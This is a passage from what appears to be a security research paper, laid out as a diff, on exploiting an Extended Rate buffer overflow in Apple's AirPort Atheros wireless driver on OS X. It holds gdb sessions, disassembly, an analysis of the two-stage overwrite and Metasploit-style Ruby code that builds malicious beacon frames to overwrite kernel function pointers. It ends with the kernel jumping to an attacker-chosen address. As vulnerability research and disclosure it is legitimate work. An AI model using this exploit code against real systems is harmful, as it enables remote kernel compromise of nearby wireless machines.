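+ */
+struct fake_scan_entry {
+    uint8_t se_xrates[2 + IEEE80211_RATE_MAXSIZE]; /* fixed 17-byte field */
+    uint8_t *se_wpa_ie;                            /* corrupted on overflow */
+};
+
+static void save_xrate_ie(struct fake_scan_entry *se, const uint8_t *ie)
+{
+    /* BUG: ie[1] is attacker-controlled and may be as large as 255. */
+    memcpy(se->se_xrates, ie, (size_t)ie[1] + 2);
+}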
+
+If no scan is forced and the target machine is not associated with an access
+point, a different crash will reliably occur in a memcmp called from a
+function named staadd. The memcmp is meant to check to see if a BSSID is the
+same as one that has been stored. However, the overflow corrupts a structure
+so that it compares the pointer to the new BSSID against a pointer that the
+attacker can set.
+
+Most of the beacon intervals in the test scripts are set to 0xffff, which is a
+little over 67 seconds. This means that a machine that receives and adds one
+of these beacon packets into its scan cache is not expecting to get another
+update from the BSSID for a little over 67 seconds. Generally, management
+frame fuzzing means the creation of something like a fake beacon frame that is
+quickly injected and forgotten. A real AP would continue sending beacon
+packets to let a potential client know it is still available. A driver will
+wait up until its beacon interval before taking actions such as marking the AP
+with the missed beacon as non-preferential for connection or even removing it
+from the scan cache altogether. In order to have many packets processed, the
+author set the beacon interval time to its maximum so the driver would not get
+suspicious for at least 67 seconds, thus allowing time for the fake AP to go
+through processing. By contrast, most beacons are normally sent several times
+a second. By using the maximum interval, one only needs to send
+a corrupted beacon packet once a minute.
+
+If the memcmp crash does not occur during normal operations, a crash in a
+function called staupdate can occur. Although the specific locations that the
+crash occurs at within this function can be different, the crash will occur
+reliably with the same data if the malicious frame is the same.
+
+Analyzing these repeated crashes helps to localize where memory corruption is
+occurring in the code. This can include static analysis using tools like IDA
+Pro to read the compiled driver code. This can also include dynamic analysis
+such as stepping through the code with a debugger like gdb to watch
+step-by-step what the driver does when it overwrites memory. Debugging a
+kernel driver in real-time requires setting up two machines for gdb and
+enabling the kernel core dump facility. There are numerous documents on how to
+set up live kernel debugging with gdb, so that information is not rehashed
+here.
+
+The specific OS X boot settings the author uses involve setting the nvram
+boot-args argument to debug=0xd44 _panicd_ip=192.168.1.1 -v. This setting is
+the easiest for two machine debugging; however, the target machine will no
+longer produce a panic log.
+
+ Things I Wish Google told me: kernel core dumps on Intel are broken
+
+ The core kernel dumping functionality on the Intel architecture appears to
+ be broken. Following the directions for the target and development machine
+ yielded no core dumps. After investigating this problem, it seems to stem
+ from the fact that the panicking machine performs no ARP resolution during a
+ crash. The panicking machine instead forwards information to its default
+ router. OS X expects the default router to forward this information to the
+ core dump server. The author has found that the best way to encourage proper
+ handling is to place the development machine on a different subnet from the
+ target machine. Keep in mind that this information was gleaned through a
+ series of changes and tests and observations with a network sniffer. 
+ Setting the ARP entry statically with the command arp -s did not help. + +4) Debugging the Crash + +One of the many benefits of remote kernel debugging is the ability to view a +stack back trace with symbol information. The vulnerability described in the +previous chapter showed crashes in many different functions such as staadd, +ath_copy_scan_results, and sta_update_not_seen. + +Googling these function names will reveal that many of them are present in the +open source Madwifi project for Atheros based wireless hardware. They are also +present in the FreeBSD net80211 project. Apple based their driver on these +open-source projects. Since these projects use the BSD open-source license, +Apple is not required to open their source code modifications. + +While the Apple Atheros driver does not exactly match the open source +projects, they match close enough to make reverse engineering much easier. The +source tree for the Apple Airport driver and Madwifi are so close that the +same debug flags work. Using sysctl to set the debug options on either +debug.net80211 or debug.athdriver will cause a flood of diagnostic information +to fill /var/log/system.log. + +TestBox:~ root# sysctl debug +debug.bpf_bufsize: 4096 +debug.bpf_maxbufsize: 524288 +debug.bpf_maxdevices: 256 +debug.iokit: 0 +debug.net80211: 0 0 +debug.athdriver: 0 0 +TestBox:~ root# sysctl -w debug.net80211=0xffffffff +debug.net80211: 0 0 -> 2147483647 2147483647 +TestBox:~ root# +TestBox:~ root# tail /var/log/system.log +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 +Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard +[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 +TestBox:~ root# + +One can read what each bit does and how they can be set using the debug tools +found in the tools directory of the Madwifi source tree. The open-source +80211debug.c file corresponds to Apple's debug.net80211 module and athdebug.c +corresponds to debug.athdriver. An enum found at the top of each debug source +file defines the bit mask and what functionality it enables. You can activate +all debugging functionality by setting the bit field to 0xffffffff. However, +when doing this, a problem arises due to the large amount of data written to +the log file. The function that performs the logging, IOLog, cannot always +keep up with the flood of messages and does not know or care if a write is +unsuccessful. 
For this reason, targeting a specific function may give more +information and help to ensure that it is not buried under a wave of data. For +instance, the following command will only show debug messages that involve the +scanning code where this vulnerability occurs. + +If one does not want to remember the bit fields, the Madwifi tools required +only minor tweaks to work with OS X, and the source is in the accompanying tar +ball with other examples for this paper. + +The task of kernel debugging ultimately rests with gdb which is not +well-suited for the job. Those people who learned kernel hacking with SoftICE +will be unhappy with gdb. It lacks basic debugger functionality such as the +ability to search through memory. Tracepoints do not work nor do hardware +breakpoints. However, it makes up for the lack of built-in functionality with +the ability to script and the ability to set commands to execute after a +breakpoint is reached. Stringing a lot of these features together makes it +possible to hack together tools that help to supplement missing features. A +short list of helpful tricks discovered during the use of gdb are included in +the following sections. + +4.1) Ghetto Profiling + +Although several texts reference the ability to enable profiling by rebuilding +the xnu kernel under OS X, that never seemed to work correctly for me. For +this reason, the author kept a written list of interesting offsets and profile +other information. For example, when you break in staadd, ECX contains a +pointer to the packet that is about to parse. To use this as a ghetto +profiler, the author would set a breakpoint at the beginning of staadd. Using +this command's feature, a conditional is used to make sure ECX is not NULL +and, if not, print the first 20 bytes of it. The debugger is then told to +continue. + +(gdb) break sta_add +Breakpoint 1 at 0x8f2e35 +(gdb) commands +Type your commands for when breakpoint 1 is hit, one per line. +End with a line saying just "end". +> if $ecx > 0x100 + >x/20x $ecx + >end +>continue +>end + +Every time this breakpoint is hit it will print the first 20 bytes of ECX and +then continue. This is useful because when the machine does crash one can see +the packet it was processing at the time. This is what it looks like when +running. + +Breakpoint 1, 0x008f2e35 in sta_add () +2: x/i $eip 0x8f2e35 : sub esp,0x3c +0x1e34f000: 0x013a0050 0x04cb1600 0x110062a3 0xfeaffb50 +0x1e34f010: 0xfb501100 0x2ef0feaf 0xf6773728 0x00000192 +0x1e34f020: 0x04110064 0x68730700 0x656b6e69 0x8204016e +0x1e34f030: 0x03968b84 0x16dd0b01 0x01f25000 0x50000001 +0x1e34f040: 0x000102f2 0x02f25000 0x50000001 0x060402f2 + +Breakpoint 1, 0x008f2e35 in sta_add () +2: x/i $eip 0x8f2e35 : sub esp,0x3c +0x1e36a000: 0x00000080 0xffffffff 0x6161ffff 0x8710ec61 +0x1e36a010: 0xec616161 0xc1c08710 0xc5962377 0xa185eaae +0x1e36a020: 0xa9b1ffff 0x55441300 0x30455362 0x34634972 +0x1e36a030: 0x4530614a 0x6f557678 0x82080137 0x0c968b84 +0x1e36a040: 0x03483018 0xf0320b01 0x41414141 0x41414141 + +The first packet is a probe response which can be determined keying off the 50 +that starts the packet. The integer format should be read in reverse +byte-order such that 0x013a0050 is actually 0x50 0x0x3a 0x01. The next packet +is 0x80 0x00 0x00 0x00 which is a beacon frame with a BSSID of 0x61 0x61 0x61 +0xec 0x10 0x87. This represents a packet that was created by the packet +generation script. + +The ghetto profiling works great on less frequently invoked breakpoints. 
The more hits a breakpoint receives, the greater the load placed on the
+machine.
+
+4.2) kgmacros
+
+When gdb is started, a file called ``kgmacros'' should be sourced; it
+contains a number of useful debugging macros from the kernel debug kit.
+Most of these macros do not seem to work on the Intel platform. In some
+cases, one may get an error message stating that the command does not work
+with this architecture. In other cases, it may just silently fail. Although
+some commands like paniclog are useful, other commands like showx86backtrace
+can actually destroy data needed for debugging.
+
+4.3) Simplifying things
+
+There is a lot to do to get gdb set up for live kernel debugging. One must
+download the correct kernel debug kit, create the correct symbols on the
+target machine, and move them to the debug machine. Following that, one must
+start gdb, import the symbols, generate an NMI on the target machine, and
+connect the debugger. These tasks should be automated as much as possible or
+one will be stuck typing the same commands repeatedly. On the target machine,
+the command to create the symbols for AirPortAtheros5424 is simple:
+
+kextload -A -s /tmp/symbols
+ /System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros5424.kext
+
+This will create the required symbols in /tmp/symbols, which can then be
+archived and transferred to the debugging machine. On the debugging machine,
+a script will do most of the manual tasks and define a macro for connecting
+to the target machine. The contents of the OSXkernelsetup script are:
+
+file /Volumes/KernelDebugKit/mach_kernel
+set architecture i386
+source /Volumes/KernelDebugKit/kgmacros
+add-symbol-file /Users/dave/symbols/com.apple.driver.AirPortAtheros5424.sym
+add-symbol-file /Users/dave/symbols/com.apple.iokit.IOPCIFamily.sym
+add-symbol-file /Users/dave/symbols/com.apple.iokit.IO80211Family.sym
+add-symbol-file /Users/dave/symbols/com.apple.iokit.IONetworkingFamily.sym
+set disassembly-flavor intel
+
+define knock
+ target remote-kdp
+ attach $arg0
+end
+
+This script is sourced instead of running all the normal startup activities.
+The knock macro replaces having to type two commands every time one needs to
+connect to the target machine.
+
+(gdb) knock 192.168.1.20
+Connected.
+(gdb)
+
+One thing to note about kernel debugging is that, although the author has
+not observed this happening often, the module being audited can load at a
+different address. When this happens, new symbols should be generated;
+otherwise nothing will match up correctly. In the author's experience, one
+can boot a machine 100 times and the module will be at the same address 99
+out of 100 times, and the one time it is not, a simple reboot should bring
+the module back to the expected address.
+
+5) Analyzing Madwifi
+
+The Madwifi source code shows that most of the crashes occur while iterating
+over the scan cache stored in a variable known as scan_state. To add an
+entry to the scan cache, a function called sta_add parses management frames
+into a structure called sta_entry.
+
+struct sta_entry {
+    struct ieee80211_scan_entry base;
+    TAILQ_ENTRY(sta_entry) se_list;
+    LIST_ENTRY(sta_entry) se_hash;
+    u_int8_t se_fails;            /* failure to associate count */
+    u_int8_t se_seen;             /* seen during current scan */
+    u_int8_t se_notseen;          /* not seen in previous scan */
+    u_int32_t se_avgrssi;         /* LPF rssi state */
+    unsigned long se_lastupdate;  /* time of last update */
+    unsigned long se_lastfail;    /* time of last failure */
+    unsigned long se_lastassoc;   /* time of last association */
+    u_int se_scangen;             /* iterator scan gen# */
+};
+
+The sta_add function is too long to print here but can be found in the
+net80211/ieee80211_scan_sta.c source file. In this function, an assignment
+is performed that sets the copy destination for all of the beacon data to
+the base member of the sta_entry structure.
+
+ise = &se->base;
+
+The ieee80211_scan_entry structure is defined as follows. Note that the
+Extended Rate buffer (se_xrates) is defined as an array with a size of
+IEEE80211_RATE_MAXSIZE + 2. This is much like other buffer overflows where
+programmers reserve fixed sized buffers in memory to hold variable length
+data from packets.
+
+/*
+ * Scan cache entry format used when exporting data from a policy
+ * module; this data may be represented some other way internally.
+ */
+struct ieee80211_scan_entry {
+    u_int8_t se_macaddr[IEEE80211_ADDR_LEN];
+    u_int8_t se_bssid[IEEE80211_ADDR_LEN];
+    u_int8_t se_ssid[2 + IEEE80211_NWID_LEN];
+    u_int8_t se_rates[2 + IEEE80211_RATE_MAXSIZE];
+    u_int8_t se_xrates[2 + IEEE80211_RATE_MAXSIZE];
+    u_int32_t se_rstamp;          /* recv timestamp */
+    union {
+        u_int8_t data[8];
+        u_int64_t tsf;
+    } se_tstamp;                  /* from last rcv'd beacon */
+    u_int16_t se_intval;          /* beacon interval (host byte order) */
+    u_int16_t se_capinfo;         /* capabilities (host byte order) */
+    struct ieee80211_channel *se_chan; /* channel where sta found */
+    u_int16_t se_timoff;          /* byte offset to TIM ie */
+    u_int16_t se_fhdwell;         /* FH only (host byte order) */
+    u_int8_t se_fhindex;          /* FH only */
+    u_int8_t se_erp;              /* ERP from beacon/probe resp */
+    int8_t se_rssi;               /* avg'd recv ssi */
+    u_int8_t se_dtimperiod;       /* DTIM period */
+    u_int8_t *se_wpa_ie;          /* captured WPA ie */
+    u_int8_t *se_rsn_ie;          /* captured RSN ie */
+    u_int8_t *se_wme_ie;          /* captured WME ie */
+    u_int8_t *se_ath_ie;          /* captured Atheros ie */
+    u_int se_age;                 /* age of entry (0 on create) */
+};
+
+IEEE80211_RATE_MAXSIZE is defined in ieee80211.h as follows:
+
+ #define IEEE80211_RATE_MAXSIZE 15 /* max rates we'll handle */
+
+The author was initially puzzled because all research to this point showed
+that the Extended Rate buffer was the culprit, yet the Madwifi source code
+had a check for a maximum length before the copy happened. At this point,
+either the corruption had to have occurred before the sta_add function or
+the length check did not work as expected. To figure out what might be
+missing, the author set a breakpoint at the beginning of sta_add and walked
+through the code. Single-stepping showed that the memcpy was called at
+0x008f3188. This was verified by looking at the size and the source being
+passed to the memcpy. Since the Extended Rate element in a script-generated
+packet is noticeably larger than in a typical packet, a conditional
+breakpoint can be set when the size argument is pushed to the stack for the
+memcpy. The following debugger output shows how the system behaves when
+this breakpoint is set:
+
+(gdb) break *0x008f3188 if $eax > 100
+Breakpoint 2 at 0x8f3188
+(gdb) c
+Continuing.
+
+Breakpoint 2, 0x008f3188 in sta_add ()
+2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax
+(gdb) stepi
+0x008f318c in sta_add ()
+2: x/i $eip 0x8f318c : mov DWORD PTR [esp+4],edx
+(gdb)
+0x008f3190 in sta_add ()
+2: x/i $eip 0x8f3190 : lea eax,[esi+63]
+(gdb)
+0x008f3193 in sta_add ()
+2: x/i $eip 0x8f3193 : mov DWORD PTR [esp],eax
+(gdb)
+0x008f3196 in sta_add ()
+2: x/i $eip 0x8f3196 : call 0x1933c8
+(gdb) x/20x $esp
+0xc82badc: 0x03aeb643 0x1e36a046 0x000000f2 0x00000080
+0xc82baec: 0x0c82bb24 0x0c82bb04 0x0c82bc8c 0x03800004
+0xc82bafc: 0x0393d72c 0x0393d704 0x1e36a00a 0x0380246c
+0xc82bb0c: 0x008f2e35 0x00000014 0x00000302 0x0c82bc8c
+0xc82bb1c: 0x00000080 0x1e36a138 0x0c82bb84 0x008e8cb9
+(gdb) x/20x 0x1e36a046
+0x1e36a046: 0x4141f032 0x41414141 0x41414141 0x41414141
+0x1e36a056: 0x41414141 0x41414141 0x41414141 0x41414141
+0x1e36a066: 0x41414141 0x41414141 0x41414141 0x41414141
+0x1e36a076: 0x41414141 0x41414141 0x41414141 0x41414141
+0x1e36a086: 0x41414141 0x41414141 0x41414141 0x41414141
+(gdb)
+
+Based on the location of the memcpy call, it is necessary to calculate the
+relative address within the binary, which can be accomplished by computing
+0x8f3196 - 0x8e7000 - 0x1000 = 0xB196. The code found within the driver
+shows that although there is a length check in the open source driver, it
+is not actually present in the OS X binary driver.
+
+__text:0000B177 mov ecx, [ebp+scanparam]
+__text:0000B17A mov edx, [ecx+28h]
+__text:0000B17D test edx, edx
+__text:0000B17F jz short loc_B19D
+__text:0000B181 movzx eax, byte ptr [edx+1]
+__text:0000B185 add eax, 2
+__text:0000B188 mov [esp+48h+var_40], eax
+__text:0000B18C mov [esp+48h+var_44], edx
+__text:0000B190 lea eax, [esi+63]
+__text:0000B193 mov [esp+48h+ic], eax
+__text:0000B196 call near ptr _memcpy ; xrate memcpy
+
+In this example, the copy size is 0xf2 and the ``Extended Rate'' buffer is
+being copied. Verifying that there is actually no length check means that
+adjacent data found within an ieee80211_scan_entry is being corrupted, such
+as another sta_entry structure.
+
+This is where the first of two serious problems manifests itself. It is
+possible to overwrite fields in a structure, but not the kind of control
+structures, such as stack or heap frames, that are typically used to gain
+code execution. This makes direct code execution more difficult.
+
+6) Getting Code Execution
+
+The result of this flaw is that many things beyond the Extended Rate buffer
+in the ieee80211_scan_entry structure are corrupted. In a traditional stack
+overflow, control of execution flow is obtained directly by overwriting an
+important value, such as the return address. The corruption caused by the
+``Extended Rate'' bug is more complicated due to the apparent lack of
+adjacent control structures.
+
+The most promising avenue for getting execution can be found in a function
+named ath_copy_scan_results. This function uses the fields that are
+overwritten to copy memory. An attacker can control the size of the copy
+and the source of the copy. In addition to crashing reliably on the same
+data, the size field used for the memcpy is two bytes wide, meaning that up
+to 65535 bytes can be copied. Since the destination of the memcpy is a
+structure that ends with a function pointer, the hope is that enough data
+can be written outside of the destination buffer to the point where the
+function pointer is overwritten. In this way, the next time the function
+pointer is called, the caller would instead jump to whatever address is now
+stored in the function pointer.
In other words, this represents a two-stage overwrite. The first overwrite
+does not provide direct code execution, but it allows an attacker to create
+a second overwrite that will. The Beacon packet contains a number of
+buffers one can use for this second-stage overwrite. Thus, an overflow in
+one buffer in the packet (the Extended Rate IE) allows an attacker to
+control how a second buffer is copied (in this case, the Robust Security
+Network (RSN) IE). It is the copying of the second buffer that will permit
+code execution. Below are the registers and the stack trace of a call to
+the second memcpy that is being discussed.
+
+(gdb) bt
+#0 0x001933de in memcpy_common ()
+#1 0x038ce804 in ?? ()
+#2 0x008c6083 in sta_iterate ()
+#3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done ()
+#4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ ()
+
+(gdb) info registers
+eax 0xaca0000 181010432
+ecx 0xc98 3224
+edx 0x3263 12899
+ebx 0x8 8
+esp 0xc71b714 0xc71b714
+ebp 0xc71b758 0xc71b758
+esi 0x41316341 1093755713
+edi 0xaca0000 181010432
+eip 0x1933de 0x1933de
+eflags 0x10203 66051
+cs 0x8 8
+ss 0x10 16
+ds 0x120010 1179664
+es 0xc710010 208732176
+fs 0x10 16
+gs 0x900048 9437256
+(gdb)
+
+EDX contains the size of the copy before it is loaded into ECX. The bytes
+in sequence in the packet were 0x41 0x63 0x31 0x41 0x63 0x32, meaning that
+the source address (what is found in ESI) and the copy size are adjacent to
+one another in the packet. The pattern that overwrote the buffer was also
+always 0x41 from the start of the ``Extended Rate'' field in the Beacon
+packet.
+
+Although this seems like an interesting plan, a call to IOMalloc right
+before the memcpy makes sure the destination buffer has enough space for
+the copy. Additionally, although a copy of up to 0xffff bytes is possible,
+it is not actually writing outside of any bounds. The disassembly for the
+memcpy call in ath_copy_scan_results is shown below:
+
+__text:000260AA call near ptr _IOMalloc
+__text:000260AF mov edx, eax
+__text:000260B1 mov ecx, [ebp+var_1C]
+__text:000260B4 mov [ecx+88h], eax
+__text:000260BA test eax, eax
+__text:000260BC jz loc_262C8
+__text:000260C2 movzx eax, word ptr [esi+84h]
+__text:000260C9 mov [esp+38h+var_30], eax
+__text:000260CD mov eax, [esi+80h]
+__text:000260D3 mov [esp+38h+var_34], eax
+__text:000260D7 mov [esp+38h+var_38], edx
+__text:000260DA call near ptr _memcpy
+
+The author could go on for hours about what other methods also did not
+work, but what does work seems more interesting. Luckily, almost
+immediately after the corruption of memory, the driver calls a function
+named ieee80211_saveie four times. The purpose of these calls is to save
+other Information Elements (such as RSN, WME, and WPA) from the Beacon
+frame into the sta_entry structure. The source code for the Madwifi version
+of ieee80211_saveie is shown below:
+
+void ieee80211_saveie(u_int8_t **iep, const u_int8_t *ie)
+{
+    u_int ielen = ie[1] + 2;
+    /*
+     * Record information element for later use.
+     */
+    if (*iep == NULL || (*iep)[1] != ie[1]) {
+        if (*iep != NULL)
+            FREE(*iep, M_DEVBUF);
+        MALLOC(*iep, void*, ielen, M_DEVBUF, M_NOWAIT);
+    }
+    if (*iep != NULL)
+        memcpy(*iep, ie, ielen);
+}
+
+A quick synopsis of this function's purpose is that a pointer to a pointer
+is passed as the address to copy data to. There is some sanity checking to
+see if the destination address is NULL or if the size of the buffer already
+stored at the destination address is different from the one just passed in.
If either of these conditions is true, a new buffer is allocated with
+MALLOC and the memcpy works just fine.
+
+Since an attacker can control every element in the structure that is passed
+in as the place to save the buffer to, the check to see if an allocation
+should be performed can be avoided and the buffer can be copied anywhere
+into memory the attacker chooses. This is pretty simple: all that is needed
+is for the byte at the destination address plus 1 to be equal to the length
+byte of the IE buffer that is to be saved.
+
+Although there are countless possibilities for what to overwrite, the
+target buffer needs to meet a few basic requirements. Preferably, an
+attacker will overwrite a function pointer. Since it seems that the driver
+loads at the same address every time, overwriting something that is at a
+fixed offset inside the driver is preferable in order to minimize the
+amount of damage done outside the driver, because one will want the machine
+to keep running long enough to execute a payload.
+
+There is a structure called sta_default. This structure holds function
+pointers needed to carry out certain parts of the driver's operation and,
+luckily, it appears to be recreated quite often, so any damage done to it
+can automatically repair itself. Here is the structure from the Madwifi
+source code:
+
+static const struct ieee80211_scanner sta_default = {
+    .scan_name = "default",
+    .scan_attach = sta_attach,
+    .scan_detach = sta_detach,
+    .scan_start = sta_start,
+    .scan_restart = sta_restart,
+    .scan_cancel = sta_cancel,
+    .scan_end = sta_pick_bss,
+    .scan_flush = sta_flush,
+    .scan_add = sta_add,
+    .scan_age = sta_age,
+    .scan_iterate = sta_iterate,
+    .scan_assoc_fail = sta_assoc_fail,
+    .scan_assoc_success = sta_assoc_success,
+    .scan_default = ieee80211_sta_join,
+};
+
+During actual live debugging, its contents can be seen as follows:
+
+(gdb) x/20x sta_default
+0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7
+0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694
+0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188
+0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000
+0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0
+(gdb)
+
+As an initial test, the author overwrote every function pointer in the
+structure with a pattern such as 0x61413761 (or aA7a in ASCII, which is the
+typical Metasploit buffer padding pattern). A crash dump with an error
+message about failing to execute code at a bad address like 0x61413761
+proves that remote code execution is theoretically possible.
+
+To better understand this, it is helpful to single-step through the sta_add
+function after sending an Extended Rate IE that is larger than 100 bytes.
+It is also helpful to then single-step through the function that handles
+saving the RSN IE buffer from the packet, called ieee80211_saveie. Finally,
+it is useful to single-step through ieee80211_saveie until the size
+comparison is hit. The kernel should crash the next time any of the
+overwritten function pointers are called.
The code used to generate the packet during this single +step is shown below: + + ssid = Rex::Text.rand_text_alphanumeric(rand(255)) + bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) + seq = [rand(255)].pack('n') + xrate = make_xrate() + rsn = make_rsn() + frame = + "\x80" + + "\x00" + + "\x00\x00" + + "\xff\xff\xff\xff\xff\xff" + + bssid + + bssid + + seq + + Rex::Text.rand_text(8) + + "\xff\xff" + + Rex::Text.rand_text(2) + + #ssid tag + "\x00" + ssid.length.chr + ssid + + #supported rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + #current channel + "\x03" + "\x01" + channel.chr + + #Xrate + xrate + + #RSN + rsn + +def make_xrate + #calculate the offset that RSN needs to overwrite + staRsnOff = 0x4aee0 + kextAddr = datastore['KEXT_OFF'].to_i + staStruct = kextAddr + staRsnOff + + #build the xrate_frame + xrate_build = Rex::Text.pattern_create(240) #base of IE + + #crashes often occur in the following locations so they are blanked + xrate_build[67, 2]="\x00\x00" + xrate_build[71, 4]="\x00\x00\x00\x00" + xrate_build[79, 4]="\x00\x00\x00\x00" + + #Overwrite address for RSN element + xrate_build[55, 4]=[staStruct].pack('V') + xrate_frame = + "\x32" + + xrate_build.length.chr + + xrate_build + return xrate_frame +end + +def make_rsn + rsn_data = Rex::Text.pattern_Create(223) + rsn_frame = + "\x30" + + rsn_data.length.chr + + rsn_data + return rsn_frame +end + +And the associated single-step through the functions: + +Breakpoint 4, 0x008f3188 in sta_add () +2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax +(gdb) advance *0x8f32fe +0x008f32fe in sta_add () +2: x/i $eip 0x8f32fe : call 0x8f521b +(gdb) stepi +0x008f521b in ieee80211_saveie () +2: x/i $eip 0x8f521b : push ebp +(gdb) +0x008f521c in ieee80211_saveie () +2: x/i $eip 0x8f521c : mov ebp,esp +(gdb) +0x008f521e in ieee80211_saveie () +2: x/i $eip 0x8f521e : push edi +(gdb) +0x008f521f in ieee80211_saveie () +2: x/i $eip 0x8f521f : push esi +(gdb) +0x008f5220 in ieee80211_saveie () +2: x/i $eip 0x8f5220 : push ebx +(gdb) +0x008f5221 in ieee80211_saveie () +2: x/i $eip 0x8f5221 : sub esp,0x2c +(gdb) +0x008f5224 in ieee80211_saveie () +2: x/i $eip 0x8f5224 : mov edi,DWORD PTR [ebp+8] +(gdb) +0x008f5227 in ieee80211_saveie () +2: x/i $eip 0x8f5227 : mov eax,DWORD PTR [ebp+12] +(gdb) +0x008f522a in ieee80211_saveie () +2: x/i $eip 0x8f522a : movzx edx,BYTE PTR [eax+1] +(gdb) +0x008f522e in ieee80211_saveie () +2: x/i $eip 0x8f522e : movzx ebx,dl +(gdb) info registers +eax 0x1e3ae130 507175216 +ecx 0xc8cbc8c 210549900 +edx 0xe0 224 +ebx 0x388f004 59305988 +esp 0xc8cba9c 0xc8cba9c +ebp 0xc8cbad4 0xc8cbad4 +esi 0x388f004 59305988 +edi 0x388f07c 59306108 +eip 0x8f522e 0x8f522e +eflags 0x216 534 +cs 0x8 8 +ss 0x10 16 +ds 0x10 16 +es 0x190010 1638416 +fs 0xc8c0010 210501648 +gs 0x48 72 +(gdb) stepi +0x008f5231 in ieee80211_saveie () +2: x/i $eip 0x8f5231 : lea eax,[ebx+2] +(gdb) +0x008f5234 in ieee80211_saveie () +2: x/i $eip 0x8f5234 : mov DWORD PTR [ebp-28],eax +(gdb) +0x008f5237 in ieee80211_saveie () +2: x/i $eip 0x8f5237 : mov eax,DWORD PTR [edi] +(gdb) +0x008f5239 in ieee80211_saveie () +2: x/i $eip 0x8f5239 : test eax,eax +(gdb) +0x008f523b in ieee80211_saveie () +2: x/i $eip 0x8f523b : je 0x8f5254 +(gdb) +0x008f523d in ieee80211_saveie () +2: x/i $eip 0x8f523d : cmp dl,BYTE PTR [eax+1] +(gdb) info registers +eax 0x931ee0 9641696 +ecx 0xc8cbc8c 210549900 +edx 0xe0 224 +ebx 0xe0 224 +esp 0xc8cba9c 0xc8cba9c +ebp 0xc8cbad4 0xc8cbad4 +esi 0x388f004 59305988 +edi 0x388f07c 59306108 +eip 0x8f523d 0x8f523d +eflags 0x202 514 +cs 0x8 
8
+ss 0x10 16
+ds 0x10 16
+es 0x190010 1638416
+fs 0xc8c0010 210501648
+gs 0x48 72
+(gdb) x/20x $eax
+0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7
+0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694
+0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188
+0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000
+0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0
+(gdb) c
+Continuing.
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+0x61413761 in ?? ()
+1: x/i $eip 0x61413761: Disabling display 1 to avoid infinite recursion.
+Cannot access memory at address 0x61413761
+(gdb) bt
+#0 0x61413761 in ?? ()
+#1 0x008e977c in scan_next ()
+Previous frame inner to this frame (corrupt stack?)
+(gdb)
+
+As can be seen above, the kernel attempted to execute an instruction at the
+invalid address 0x61413761. This address was provided in the generated
+packet. While this does not show actual code execution, it does prove that
+code execution is possible. An attacker can overwrite every member of that
+structure with the address of arbitrary memory that the attacker controls.
+Since the length byte of the IE has to match the byte found at
+sta_default+1, the buffer needs to be 0xe0 bytes in length. This means
+that, since sta_default is 64 bytes, one writes more than is needed.
+Immediately after sta_default in memory is a structure called chanflags,
+which is also at a predictable address. To execute code of an attacker's
+choosing, the remainder of the RSN IE buffer can be packed with NOPs ending
+with 0xcc 0xcc 0xcc 0xcc, which will cause a trap to the debugger, making
+it possible to examine the state and verify that code actually executed.
+(0xcc is the machine code for the int 3 assembly instruction, which causes
+a processor interrupt that a debugger can safely catch.) This is an
+important step, as OS X claims to have NX protection that would prohibit
+certain memory regions from executing code. Executing a NOP sled and then
+the 0xcc bytes will prove that protection technologies like NX do not
+affect execution in this situation.
